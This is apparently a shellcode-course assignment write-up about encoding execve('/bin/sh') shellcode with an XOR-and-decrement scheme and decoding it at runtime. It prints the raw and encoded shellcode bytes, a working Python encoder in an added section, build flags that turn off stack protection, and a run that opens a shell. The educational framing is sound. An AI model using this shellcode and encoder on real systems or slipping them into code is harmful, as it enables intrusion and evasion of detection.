- Create a custom encoding scheme like the "Insertion Encoder" shown in the course
- PoC using execve-stack as the shellcode: encode it with your scheme, then decode and execute it
We start by writing a Python encoder. The shellcode being encoded is the execve("/bin/sh") stack shellcode from shell-storm:
http://shell-storm.org/shellcode/files/shellcode-811.php
/* 28 bytes, null-free: execve("//bin/sh", NULL, NULL) followed by exit(0) */
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x89\xc1\x89\xc2\xb0\x0b"
"\xcd\x80\x31\xc0\x40\xcd\x80";
Content of encoder.py
Running this produces the encoded shellcode (each byte is XORed with 0xff and then decremented by 1, wrapping modulo 256), printed both as a C string and as a NASM db list:
nelis@slae:~/SLAE/assignment4$ ./encoder.py
\xcd\x3e\xae\x96\xcf\xcf\x8b\x96\x96\xcf\x9c\x95\x90\x75\x1b\x75\x3d\x75\x3c\x4e\xf3\x31\x7e\xcd\x3e\xbe\x31\x7e
0xcd,0x3e,0xae,0x96,0xcf,0xcf,0x8b,0x96,0x96,0xcf,0x9c,0x95,0x90,0x75,0x1b,0x75,0x3d,0x75,0x3c,0x4e,0xf3,0x31,0x7e,0xcd,0x3e,0xbe,0x31,0x7e,
Shellcode length: 28
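The post's encoder.py is not reproduced above, so the following is an added example (my own code, not the author's) that implements the same scheme: XOR with 0xff, subtract 1, wrap to 8 bits. It also does two checks a practitioner wants before pasting the bytes into a decoder stub: a round-trip decode to confirm the inverse (add 1, then XOR 0xff) really restores the input, and a scan of the encoded output for 0x00 (any input byte of 0xfe encodes to 0x00 under this scheme and would truncate a string-copied payload). The shellcode bytes are the ones from the post; the function names and the bad-byte list are my own choices.

```python
#!/usr/bin/env python3
"""Added example: XOR-0xff-then-minus-1 shellcode encoder with round-trip and null-byte checks."""

# execve("/bin/sh") shellcode from the post (shell-storm #811), 28 bytes.
SHELLCODE = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73,
    0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89,
    0xe3, 0x89, 0xc1, 0x89, 0xc2, 0xb0, 0x0b,
    0xcd, 0x80, 0x31, 0xc0, 0x40, 0xcd, 0x80,
])

XOR_KEY = 0xff   # assumption: same key as the post
SUB_VALUE = 1    # assumption: same decrement as the post


def encode(shellcode, xor_key=XOR_KEY, sub=SUB_VALUE):
    """Encode each byte as ((b ^ xor_key) - sub) mod 256.

    The '& 0xff' mirrors what an 8-bit SUB in the decoder does, so 0xff
    (0xff ^ 0xff = 0x00, minus 1) wraps to 0xff rather than going negative.
    """
    return bytes(((b ^ xor_key) - sub) & 0xff for b in shellcode)


def decode(encoded, xor_key=XOR_KEY, sub=SUB_VALUE):
    """Inverse of encode(): add first, then XOR. This is what the NASM decoder stub must do."""
    return bytes((((b + sub) & 0xff) ^ xor_key) for b in encoded)


def find_bad_bytes(encoded, bad=(0x00,)):
    """Return the offsets of bytes the delivery channel cannot carry (default: NUL only)."""
    return [i for i, b in enumerate(encoded) if b in bad]


def format_c_string(data):
    """\\x-escaped form for a C char array."""
    return "".join("\\x%02x" % b for b in data)


def format_nasm_db(data):
    """0x..,0x.., form for a NASM 'db' line; the trailing comma matches the post's output."""
    return ",".join("0x%02x" % b for b in data) + ","


def main():
    encoded = encode(SHELLCODE)

    # Sanity check 1: the decoder transform must restore the original bytes.
    if decode(encoded) != SHELLCODE:
        raise SystemExit("round-trip failed: decoder transform is not the inverse of the encoder")

    # Sanity check 2: no NUL bytes, otherwise strcpy-style delivery truncates the payload.
    bad = find_bad_bytes(encoded)
    if bad:
        raise SystemExit("encoded shellcode contains bad bytes at offsets %r; pick another key" % bad)

    print(format_c_string(encoded))
    print(format_nasm_db(encoded))
    print("Shellcode length: %d" % len(encoded))


if __name__ == "__main__":
    main()
```

Running it prints the same two lines and length as the post. Changing XOR_KEY is the usual fix when the bad-byte check fails; the decoder stub then needs the matching key in its xor instruction.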
We now have the encoded shellcode that we need in our assembly decoder. The decoder undoes the transformation in the opposite order on every byte: add 1, then XOR with 0xff, and only then jump to the restored shellcode.
Construction of decoder.nasm
Compile the decoder using ./compile.sh, paste the resulting bytes into shellcode.c, and build it with the stack executable and without stack protection (the decoder writes to its own bytes, so the page it lives on must be writable and executable):
nelis@slae:~/SLAE/assignment4$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
nelis@slae:~/SLAE/assignment4$ ./shellcode
Payload shellcode Length: 51
$ id
uid=1000(nelis) gid=1000(nelis) groups=1000(nelis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)